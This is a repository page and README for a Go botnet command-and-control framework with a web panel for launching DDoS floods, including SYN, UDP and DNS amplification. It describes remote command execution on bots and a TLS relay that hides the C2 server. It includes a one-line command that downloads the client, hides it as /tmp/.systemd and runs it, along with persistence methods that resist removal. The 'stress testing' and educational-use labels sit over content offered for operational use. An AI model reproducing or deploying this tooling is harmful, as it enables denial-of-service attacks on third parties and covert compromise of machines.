https://github.com/1birdo/gostress-optimized
Just a Cleaner and Updated version of Gostress-Enhanced, Everything Implemented
https://github.com/1birdo/gostress-optimized
audited botnet c2 client ddos ddos-attacks development framework golang mirai proxy stress stress-testing stressersource stressing user-management web-dashboard web-ui website
Last synced: 3 months ago
JSON representation
Just a Cleaner and Updated version of Gostress-Enhanced, Everything Implemented
- Host: GitHub
- URL: https://github.com/1birdo/gostress-optimized
- Owner: 1Birdo
- License: gpl-3.0
- Created: 2025-07-05T20:02:03.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2025-07-05T20:51:22.000Z (3 months ago)
- Last Synced: 2025-07-05T21:20:34.743Z (3 months ago)
- Topics: audited, botnet, c2, client, ddos, ddos-attacks, development, framework, golang, mirai, proxy, stress, stress-testing, stressersource, stressing, user-management, web-dashboard, web-ui, website
- Language: HTML
- Homepage: https://Birdo.uk
- Size: 136 KB
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Changelog: history.log
- License: LICENSE
- Code of conduct: CODE_OF_CONDUCT.md
Awesome Lists containing this project
README
## Overview
*This is a lightweight, web-based Command and Control C2 with stress testing capabilities using external Devices or Servers. It allows operators to manage Clients, monitor activity, and perform a variety of network stress test methods through a secure interface.*
![]()
![]()
![]()
![]()
## 🔁 TLS Proxy Module
*The TLS Proxy module enables encrypted traffic forwarding between Clients and the C2 server. This acts as a secure Third-party, offering stealth, traffic redirection, and flexible network deployment strategies.*
Hopefully to have P2P + load-balancing capabilites Implemented soon
---
Just a fake page to display for the proxy you can server a php status page or something if needed,
just a index.hmtl at the moment
![]()
### 🌐 Purpose
*The proxy listens for incoming TLS connections from Client and securely forwards traffic to the core C2 server. This provides:*
- **Obfuscation** of real C2 infrastructure
- **Traffic rerouting** through dedicated relay / offshore nodes
- **Flexible deployment** across cloud or on-prem infrastructure---
### 🔧 Configuration (`proxy.go`)
| Constant | Description | Default Value |
|------------------|------------------------------------|-------------------------|
| `PROXY_LISTEN` | Interface and port to listen on | `0.0.0.0:7003` |
| `SERVER_ADDR` | Target C2 server address/port | `192.168.1.50:7002` |
| `CONNECT_TIMEOUT`| Timeout when connecting to server | `10s` |
| `IO_TIMEOUT` | I/O read/write timeout | `30s` |
| `CERT_FILE` | TLS certificate file | `server.crt` |
| `KEY_FILE` | TLS private key file | `server.key` |---
### 🛠 How It Works
1. Proxy starts and listens for TLS connections on the configured IP/port.
2. Once a Client connects, the proxy attempts a secure connection to the backend C2 server.
3. After both ends are connected, the proxy begins full-duplex communication using `io.Copy()`.
4. This allows for secure communication and a hidden entry point towards the C2 server
---### ✅ Usage
Build and run:
```bash
go build -o proxy proxy.go
./proxy
```
You will need to provide the certificates for this to work.## Features
### All the same as Gostress just no Geolocation and a fully working dashboard with optimised code### ✅ Web-Based Interface
- Real-time Client monitoring
- Attack control panel
- User management system
- Attack history tracking### 🚀 Stress Testing Modules
- UDP Flood
- TCP Flood
- SYN Flood
- ACK Flood
- GRE Flood
- DNS Amplification
- HTTP Flood### 🧠 Client Management
- Auto Client connection handling
- Heartbeat & status monitoring
- Hardware resource reporting
- Remote command execution### 🔐 Security
- Challenge-response authentication
- TLS encrypted communication
- Session & password management
- Enforced password complexity
---## Installation
### Quick Setup
1. **Clone the repository**
```bash
git clone https://github.com/1Birdo/Gostress-Optimized.git
cd Gostress-Optimized
```2. **Build server and Client**
```bash
go build -o server main.go
go build -o bot bot.go
```3. **Run the server**
```bash
./server
```5. **Deploy clients to desired systems**
```bash
You can decide how you want to access and deploy your client to the systems you own either 'scp' or a python http module or other methods.
```
---## Configuration
### Server Settings (`main.go`)
```go
const (
USERS_FILE = "users.json"
BOT_SERVER_IP = "0.0.0.0"
BOT_SERVER_PORT = "7003"
WEB_SERVER_IP = "0.0.0.0"
WEB_SERVER_PORT = "443"
CERT_FILE = "server.crt"
KEY_FILE = "server.key"
)
```### Client Settings (`Client.go`)
```go
const (
C2Address = "your.server.ip:7003"
)
```---
## Usage
### Web Dashboard
- Visit: `https://your-server-ip`
- Default Login:
- **Username**: `root`
- **Password**: *(auto-generated, shown on first run)*### Manage Client
- View all connected Client and their statuses
- Access detailed hardware/resource reports
- Execute remote commands### Launch Attacks
1. Select a method
2. Enter target details
3. Define duration
4. Click **"Initiate Attack Sequence"**### Manage Users
- Create, delete, or modify users (Admin role only)---
## Deployment Options
### Linux Client Deployment
```bash
curl http://your-server-ip/Client -o /tmp/.systemd && chmod +x /tmp/.systemd && /tmp/.systemd
```### Persistence Methods
- Systemd service
- Cron job
- File lock to prevent deletion---
## Troubleshooting
### Clients not connecting?
- Double-check `C2Address` in the Client binary
- Ensure server ports are open and listening
- Review firewall or security group settings### Web interface not loading?
- Verify SSL certificate paths
- Confirm port 443 is accessible
- Check server logs for errors### Attacks not effective?
- Confirm target IP/hostname and port
- Ensure Clients are online
- Verify method compatibility---
## Security Best Practices
⚠️ **Important:**
- Change the default `root` password immediately
- Use strong, unique passwords for all users
- Restrict dashboard access (VPN, firewall, etc.)
- Keep the system and Go packages updated
- Regularly audit Clients activity and logs---
## License
**For educational and research purposes only.**
The authors are **not responsible** for any misuse or unauthorized use of this tool.